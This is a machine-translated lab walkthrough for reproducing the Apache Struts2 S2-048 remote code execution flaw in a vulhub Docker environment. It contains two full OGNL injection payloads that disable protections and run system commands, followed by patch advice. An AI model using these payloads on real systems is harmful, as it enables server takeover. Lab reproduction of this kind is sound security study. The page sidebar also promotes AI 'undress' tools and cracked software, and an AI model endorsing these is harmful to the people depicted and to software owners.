search
HomeOperation and MaintenanceSafetyHow to reproduce the Apache Struts2--048 remote code execution vulnerability

0x0#0Introduction

The Struts2 framework is an open source web application architecture for developing Java EE web applications . It utilizes and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the excellent design ideas of WebWork as the core, absorbs some advantages of the Struts framework, and provides a neater Web application framework implemented in the MVC design pattern.

0x01 Vulnerability Overview

The Apache Struts2 2.3.x series has the struts2-struts1-plugin plug-in enabled and the struts2-showcase directory exists. The cause of the vulnerability is when ActionMessage receives the client When controlling parameter data, improper processing after subsequent data splicing and transmission leads to arbitrary code execution

0x02 Impact scope

Struts2 is enabled in the Apache Struts 2.3.x series -struts1-plugin plug-in version.

0x03 environment construction

1. It is more complicated to build Apache Struts2 by yourself. This vulnerability environment is built using the docker environment in vulhub.

Download address: https://github.com/vulhub/vulhub

2. After downloading, unzip and enter the s2-048 directory, and start the vulnerability environment

cd cd vulhub -master/struts2/s2-048/ //Enter the directory

怎么进行Apache Struts2--048远程代码执行漏洞复现

##docker-compose up -d //Start the shooting range

怎么进行Apache Struts2--048远程代码执行漏洞复现

3. Use docker ps to check whether the startup is successful

怎么进行Apache Struts2--048远程代码执行漏洞复现

4. Enter http:your-ip:8080/hello.action in the browser and see the following page environment Construction completed

怎么进行Apache Struts2--048远程代码执行漏洞复现

0x04 vulnerability recurrence

1. Enter the following link in the browser to access the vulnerability page

http://192.168.3.160:8080/integration/saveGangster.action

怎么进行Apache Struts2--048远程代码执行漏洞复现

2. Enter ${1+1} in the first form "Gangster Name", Enter whatever you want below, click submit to view the executed OGNL expression

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现##2. Put ${1+1 at "Gangster Name" }Modify the payload statement executed by the following command

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[' com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@ getRuntime().exec('id').getInputStream())).(#q)}

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现3. You can also Use Burp to capture the packet and modify it into the statement of the payload executed by the command

Note: The payload needs to be URL encoded

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?( #_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id') .(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe', '/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream( true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io. IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

怎么进行Apache Struts2--048远程代码执行漏洞复现

4. It can be implemented using automated scripts or graphical tools, and is not demonstrated here.

Tools can be searched and downloaded on GitHub

0x05 repair suggestions

1. Upgrade It is recommended to upgrade to the latest version

2. According to business conditions, disable and close (delete) \struts-2.3.x\apps\struts2-showcase.war package

The above is the detailed content of How to reproduce the Apache Struts2--048 remote code execution vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Statement
This article is reproduced at:亿速云. If there is any infringement, please contact admin@php.cn delete

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Tools

SublimeText3 English version

SublimeText3 English version

Recommended: Win version, supports code prompts!

ZendStudio 13.5.1 Mac

ZendStudio 13.5.1 Mac

Powerful PHP integrated development environment

Safe Exam Browser

Safe Exam Browser

Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

EditPlus Chinese cracked version

EditPlus Chinese cracked version

Small size, syntax highlighting, does not support code prompt function